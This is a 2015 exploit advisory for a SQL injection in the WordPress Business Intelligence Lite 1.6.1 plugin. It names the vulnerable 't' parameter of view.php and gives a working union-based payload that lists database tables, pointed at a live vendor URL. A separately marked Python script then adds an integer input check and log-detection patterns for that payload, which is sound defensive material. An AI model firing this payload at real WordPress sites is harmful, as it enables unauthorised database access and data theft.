KhiZaRix

WordPress Business Intelligence Lite 1.6.1 SQL Injection

##################################################################################################

#Exploit Title : Wordpress Plugin 'Business Intelligence' Remote SQL Injection vulnerability

#Author : Jagriti Sahu AKA Incredible

#Vendor Link : https://www.wpbusinessintelligence.com

#Download Link : https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.6.1.zip

#Date : 1/04/2015

#Discovered at : IndiShell Lab

#Love to : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^

##################################################################################################

////////////////////////

/// Overview:

////////////////////////

The WordPress plugin "Business Intelligence" does not filter the data in the GET parameter 't' of the file 'view.php'

and passes the user-supplied value straight into its SQL queries; hence an SQL injection vulnerability exists.

///////////////////////////////

// Vulnerability Description: /

///////////////////////////////

The vulnerability is due to the parameter 't' in the file 'view.php'.

A user can inject an SQL query using the GET parameter 't'.

////////////////

/// POC ////

///////////////

POC Image URL--->

=================

[Screenshot was hosted on TinyPic; the image URL is not preserved on this page.]

SQL Injection in parameter 't' (file 'view.php'):

=================================================

Injectable Link---> http://www.wpbusinessintelligence.com/wp-content/plugins/wp-business-intelligence/view.php?t=1

A union-based SQL injection exists in this parameter, which can be exploited as follows:

Payload used in exploitation for database name --->

http://www.wpbusinessintelligence.com/wp-content/plugins/wp-business-intelligence/view.php?t=1337+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+
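The advisory gives only the payload shape. As an added example (not part of the original advisory or of the plugin's code), the following Python script shows the two things a defender takes from it: the input check that 'view.php' should have applied to 't' (a plain integer, nothing else) and detection logic that runs over web-server access logs to flag requests where 't' carries union-based injection markers. The log lines, client addresses and host are constructed for the example; the request path is the one the advisory names.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache combined format). Addresses are
# documentation ranges, not real clients. Line 2 carries the payload shape from
# the advisory; line 4 carries a URL-encoded variant; lines 1 and 3 are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Apr/2015:10:00:01 +0000] "GET /wp-content/plugins/wp-business-intelligence/view.php?t=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Apr/2015:10:00:07 +0000] "GET /wp-content/plugins/wp-business-intelligence/view.php?t=1337+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Apr/2015:10:01:00 +0000] "GET /wp-content/plugins/wp-business-intelligence/view.php?t=42 HTTP/1.1" 200 640 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Apr/2015:10:02:00 +0000] "GET /wp-content/plugins/wp-business-intelligence/view.php?t=1%20UNION%20SELECT%201,2,3 HTTP/1.1" 500 0 "-" "curl/7.40"
"""

# Client address and request line of a combined-format log entry.
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Markers typical of union-based enumeration, applied to the URL-decoded value.
INDICATORS = {
    "union_select": re.compile(r"union\s+(all\s+)?select", re.I),
    "information_schema": re.compile(r"information_schema", re.I),
    "sql_comment": re.compile(r"(--|/\*)"),
    "group_concat": re.compile(r"group_concat\s*\(", re.I),
}


def is_plain_integer(value):
    """The allow-list check 'view.php' needed: 't' is an identifier, so only
    unsigned decimal digits are acceptable. Anything else is rejected before
    it can reach a query (the equivalent of casting to int / using a prepared
    statement on the PHP side)."""
    return re.fullmatch(r"\d+", value) is not None


def sqli_indicators(value):
    """Return the sorted list of indicator names present in a decoded value."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(value))


def scan_log(log_text):
    """Flag every request to view.php whose 't' parameter is not a plain
    integer, together with the injection markers found in it."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/view.php"):
            continue
        # parse_qs URL-decodes the value, so '+' and '%20' both become spaces
        # and the detection regexes see what the database would have seen.
        for value in parse_qs(parts.query, keep_blank_values=True).get("t", []):
            if is_plain_integer(value):
                continue
            findings.append({
                "client": m.group("client"),
                "t": value,
                "indicators": sqli_indicators(value),
            })
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['client']}  t={hit['t']!r}  indicators={hit['indicators']}")
```

Run as a script it prints the two flagged requests; the benign `t=1` and `t=42` entries pass the integer check and are never examined further. The integer allow-list alone is the fix; the indicator regexes only add context to an alert and are not a substitute for it, since any non-integer 't' is already an error for this endpoint.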

###################################################################################################

--==[[special Thanks to]]==--

# Manish Kishan Tanwar ^_^ #

Source: http://packetstorm.wowhacker.com/1504-exploits/wpbusinessintelligence-sql.txt
